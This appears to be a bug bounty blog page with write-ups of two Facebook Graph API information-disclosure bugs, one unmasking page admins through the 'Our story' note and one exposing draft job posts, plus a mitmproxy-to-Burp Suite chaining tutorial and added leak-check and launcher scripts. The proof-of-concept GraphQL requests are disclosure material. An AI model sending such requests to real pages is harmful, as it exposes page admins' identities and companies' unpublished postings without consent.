Wednesday, May 23, 2018

Facebook: Disclose page admins via “Story” feature

The admins of a Facebook Page are meant to be kept secret. Facebook Pages have a "Story" feature, called "Our History". It is actually a normal Facebook Note, in which "Our History" is the note title and the description is the "Body" part.

If a Page admin or Page editor creates this note, it also discloses their name instead of the page name, because a user created it. That is the bug in this scenario: it should have returned only the "Page Name".

Here is how the flaw was discovered through a "GraphQL" query.

Author: Philippe Harewood.

Proof of Concept:
1) Request:
GET /v2.12/graphql?q=nodes(page-id){page_story{from,published_document{document_owner}}} HTTP/1.1
Host: graph.facebook.com
2) Response:
{
  "page-id": {
    "page_story": {
      "from": {
        "name": "Page Name"
      },
      "published_document": {
        "document_owner": {
          "name": "Admin or Editor User Name"
        }
      }
    }
  }
}
 
Impact:
This could have let a malicious user derive the name of a page admin or editor that last authored or edited the ‘Our story’ on any chosen page. Note: the attack only works for pages that have ‘Our story’ feature authored/edited.

Source: philippeharewood.com
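
A regression check for the flaw described above, as an added example that is not from the original post or from Facebook: it walks a response shaped like the one in the proof of concept and reports every actor name inside "page_story" that differs from the page's own name. The sample data and the function names actor_names and find_identity_leaks are constructed for illustration.

```python
import json

# Constructed sample shaped like the response in the proof of concept (not real data).
SAMPLE = json.loads("""
{
  "1111": {"page_story": {"from": {"name": "Page Name"},
           "published_document": {"document_owner": {"name": "Admin or Editor User Name"}}}},
  "2222": {"page_story": {"from": {"name": "Other Page"},
           "published_document": {"document_owner": {"name": "Other Page"}}}},
  "3333": {"page_story": null}
}
""")


def actor_names(node, path=""):
    """Yield (path, name) for every object with a string 'name' below node."""
    if isinstance(node, dict):
        if isinstance(node.get("name"), str):
            yield path, node["name"]
        for key, child in node.items():
            yield from actor_names(child, f"{path}.{key}" if path else key)
    elif isinstance(node, list):
        for i, child in enumerate(node):
            yield from actor_names(child, f"{path}[{i}]")


def find_identity_leaks(response):
    """Return (page_id, path, name) for story actors that are not the page itself."""
    leaks = []
    for page_id, node in response.items():
        story = (node or {}).get("page_story")
        if not story:
            continue  # page has no story, nothing to check
        page_name = (story.get("from") or {}).get("name")
        for path, name in actor_names(story):
            if name != page_name:
                leaks.append((page_id, path, name))
    return leaks


if __name__ == "__main__":
    for page_id, path, name in find_identity_leaks(SAMPLE):
        print(f"page {page_id}: {path} exposes {name!r}")
```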

How to chain or forward mitmproxy to burp suite or any other proxy tool

mitmproxy is a free and open source interactive HTTPS proxy tool. It is becoming popular nowadays because it has some unique features, but it is not yet as fully featured as Burp Suite or other proxy tools. The problem is that mitmproxy works great up to a point, but you cannot use the tools and features of something like Burp Suite, or its plugins, with it.

It is possible to "chain" or forward mitmproxy to any other proxy tool you prefer, which makes the combination of both proxy tools more useful.

We use "mitmproxy" as the primary proxy server, then forward all mitmproxy traffic to Burp Suite as the secondary proxy tool.

For example:
Client => mitmproxy => Burp Suite => Server.
Step 1:
Install and run "mitmproxy ui" in Windows 10.



Step 2:
You will see, mitmproxy is running!
Web   server listening at http://127.0.0.1:8081/
Proxy server listening at http://*:8080
 
Your web browser will open the "Web Server" tool.
(Make sure you have correctly set up your client to use the proxy at "127.0.0.1:8080" and that the mitmproxy certificate is installed.)

Step 3:
Now navigate to the menu in the "Web Server" window:
mitmproxy -> Options.


Step 4:
mitmproxy comes with various modes of operation.
One of these is the "upstream" proxy mode, which is the one we have to choose.

It lets us forward mitmproxy traffic to another proxy.
 
The default is "regular" mode.
Change it to this:
upstream:http://127.0.0.1:8888
You can choose any port you like for forwarding to the other proxy tool.
(Note: do not enter "https://"; only use "http://HOST:PORT", otherwise it will not work.)

Step 5:
Now we have to set one more option value (upstream_cert).
upstream_cert => Tick to enable it.
 
Step 6:
Final step: run "Burp Suite" and set up a proxy listener on the HOST:PORT used in upstream mode.
Burp Suite => Proxy => Options => Edit/Add.
Binding => All Interfaces (127.0.0.1) => PORT => 8888
Done.
 
Good! Now everything is set up correctly, and we can intercept in Burp Suite the traffic that is forwarded from the mitmproxy server.

I've uploaded a video with more details and clarification.
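
The UI settings from Steps 3 to 5 expressed as a command line, as an added example that is not part of the original post: it validates the upstream URL against the rule in Step 4, checks that the Burp listener is actually accepting connections, and builds the launch command. It assumes the "mitmproxy ui" is started with the mitmweb command; the function names are hypothetical, and the --listen-host setting is an addition, since the banner in Step 2 shows the proxy bound to all interfaces (*:8080).

```python
import socket
from urllib.parse import urlsplit


def upstream_mode(proxy_url):
    """Mode string for Step 4; only plain http://HOST:PORT is accepted."""
    parts = urlsplit(proxy_url)
    if parts.scheme != "http":
        raise ValueError("use http://HOST:PORT, not scheme %r" % parts.scheme)
    if not parts.hostname or parts.port is None or parts.path not in ("", "/"):
        raise ValueError("expected http://HOST:PORT")
    # IPv4 address or hostname assumed (as in the post's 127.0.0.1 example).
    return f"upstream:http://{parts.hostname}:{parts.port}"


def listener_up(host, port, timeout=1.0):
    """True if something (here: the Burp listener) accepts TCP connections."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def mitmweb_command(proxy_url, listen_port=8080, web_port=8081):
    """Build the mitmweb argv equivalent to Steps 3-5 done in the UI."""
    return [
        "mitmweb",
        "--mode", upstream_mode(proxy_url),      # Step 4
        "--set", "upstream_cert=true",           # Step 5
        # Added hardening, not in the post: bind the proxy to loopback so
        # other hosts on the network cannot send traffic through it.
        "--listen-host", "127.0.0.1",
        "--listen-port", str(listen_port),
        "--web-port", str(web_port),
    ]


if __name__ == "__main__":
    burp = "http://127.0.0.1:8888"  # listener address from Step 6
    if not listener_up("127.0.0.1", 8888):
        raise SystemExit("nothing listening on 127.0.0.1:8888; start Burp first")
    print(" ".join(mitmweb_command(burp)))
```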

Friday, May 18, 2018

Facebook: Disclose job posts by a page which are in drafts

Recently, Facebook publicly launched its new "Job Posting" feature for Facebook Pages. This feature is limited to business pages in the "US and Canada Region". More details can be found here.
A draft job post is an upcoming job opening saved as a draft for the future. Disclosing such a draft post may have a bad impact, as it should be secret information for the company.

A Facebook security researcher, "Asadul Islam", found this bug in the "Facebook Graph API".

Author: Asadul Islam.

Proof of concept:
1) Make a POST request to graphql.

POST /v2.12/graphql HTTP/1.1
Host: graph.facebook.com

fb_api_caller=RelayModern&variables={"PageID":"123456789"}&doc_id=1846201855397726



Impact:
This could have let users access job posts which are not meant to be accessible.

Introduction to the Bug Bounty Group and Blog

Hello folks,

Let me introduce this "Bug Bounty Group" and its blog.
This is a general public discussion and educational blog, and it will also be a "Community" on social networks, such as a Facebook Group.
News will be posted on the "Facebook Page" and the "Twitter" handle.

I'll describe and categorize posts in this manner: blog categories and labels.

"Bug Bounty Group" is a place where researchers can gain knowledge about security and understand vulnerability scope and bugs.

This blog is created only for educational purposes. It doesn't contain any pirated material or resources. Publishing bad or harmful comments or discussion, or links to bad external sites, is not allowed.

See the Rules page for the strict rules.

Facebook Payout Frequently Asked Questions

What bounty payment methods are available to me? PayPal Bitcoin (via Coinbase) EFT/wire transfer (via Western Union) Pre-paid debit ca...